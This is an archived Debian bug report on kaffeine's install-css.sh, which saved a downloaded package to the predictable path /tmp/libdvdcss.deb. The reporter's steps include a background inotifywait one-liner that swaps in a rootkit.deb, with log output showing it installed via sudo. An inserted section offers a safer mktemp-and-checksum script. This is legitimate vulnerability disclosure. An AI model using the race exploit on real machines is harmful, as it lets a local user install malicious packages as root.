Debian Bug report logs - #554772
install-css.sh: insecure temporary file /tmp/libdvdcss.deb


Package: kaffeine; Maintainer for kaffeine is Debian KDE Extras Team <pkg-kde-extras@lists.alioth.debian.org>; Source for kaffeine is src:kaffeine.

Reported by: Timo Juhani Lindfors <timo.lindfors@iki.fi>

Date: Fri, 6 Nov 2009 12:42:01 UTC

Severity: normal

Tags: security

Found in version kaffeine/0.8.7-1

Fixed in version 1.0-1

Done: Petter Reinholdtsen <pere@hungry.com>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian KDE Extras Team <pkg-kde-extras@lists.alioth.debian.org>:
Bug#554772; Package kaffeine. (Fri, 06 Nov 2009 12:42:04 GMT)

Acknowledgement sent to Timo Juhani Lindfors <timo.lindfors@iki.fi>:
New Bug report received and forwarded. Copy sent to Debian KDE Extras Team <pkg-kde-extras@lists.alioth.debian.org>. (Fri, 06 Nov 2009 12:42:04 GMT)

Message #5 received at submit@bugs.debian.org:

From: Timo Juhani Lindfors <timo.lindfors@iki.fi>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
Date: Fri, 06 Nov 2009 14:09:54 +0200
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/install-css.sh

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46--  http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...


-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information
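The root cause above is a fixed, predictable path (/tmp/libdvdcss.deb) in a world-writable directory, which lets any local user pre-create or swap the file between wget finishing and dpkg reading it. The following is an added example of how such a download-then-install step can be written safely; it is not the install-css.sh from the kaffeine package, and the URL and SHA-256 digest it uses are placeholders.

```bash
#!/bin/bash
# Added example, not the original install-css.sh: keep the temporary .deb in a
# private mktemp directory and check it before handing it to dpkg.
set -eu

# Refuse a candidate .deb unless it is a regular file (not a symlink planted by
# another user), lives inside the private workdir, is owned by the caller, and
# matches the digest pinned by the script author.
# $1: path to the .deb   $2: private workdir   $3: expected SHA-256 hex digest
verify_deb() {
    local deb=$1 workdir=$2 expected=$3 actual
    case "$deb" in
        "$workdir"/*) ;;
        *) echo "$deb is outside $workdir" >&2; return 1 ;;
    esac
    if [ -L "$deb" ] || [ ! -f "$deb" ]; then
        echo "$deb is not a regular file" >&2; return 1
    fi
    if [ ! -O "$deb" ]; then
        echo "$deb is not owned by $(id -un)" >&2; return 1
    fi
    actual=$(sha256sum "$deb" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $deb" >&2; return 1
    fi
    return 0
}

# mktemp -d creates a fresh directory with mode 0700 and an unpredictable name,
# so there is no fixed /tmp path for a local user to pre-create or replace.
# Both arguments are placeholders in this example.
install_css() {
    local url=${1:-https://example.invalid/libdvdcss2_PLACEHOLDER.deb}
    local expected=${2:-0000000000000000000000000000000000000000000000000000000000000000}
    local workdir deb
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/libdvdcss.XXXXXXXXXX")
    trap 'rm -rf "$workdir"' EXIT
    deb=$workdir/libdvdcss.deb
    wget -q -O "$deb" "$url"
    verify_deb "$deb" "$workdir" "$expected"
    dpkg -i "$deb"
}
```

The digest check also closes the second weakness visible in the log: the package was fetched over plain HTTP with no integrity check at all.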




Reply sent to Petter Reinholdtsen <pere@hungry.com>:
You have taken responsibility. (Mon, 09 Aug 2010 13:33:05 GMT)

Notification sent to Timo Juhani Lindfors <timo.lindfors@iki.fi>:
Bug acknowledged by developer. (Mon, 09 Aug 2010 13:33:05 GMT)

Message #10 received at 554772-done@bugs.debian.org:

From: Petter Reinholdtsen <pere@hungry.com>
To: 554772-done@bugs.debian.org
Subject: Re: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
Date: Mon, 09 Aug 2010 15:30:48 +0200
Version: 1.0-1

I had a look in version 1.0-1 in testing, and
/usr/share/doc/kaffeine/install-css.sh no longer exists in the package.
Because of this, I believe this bug can be closed.

I did not find anything about its removal in the Debian changelog, so I
do not know in which version it was taken away.

Happy hacking,
-- 
Petter Reinholdtsen




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 07 Sep 2010 07:35:37 GMT)


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 10:37:33 2014; Machine Name: beach.debian.org
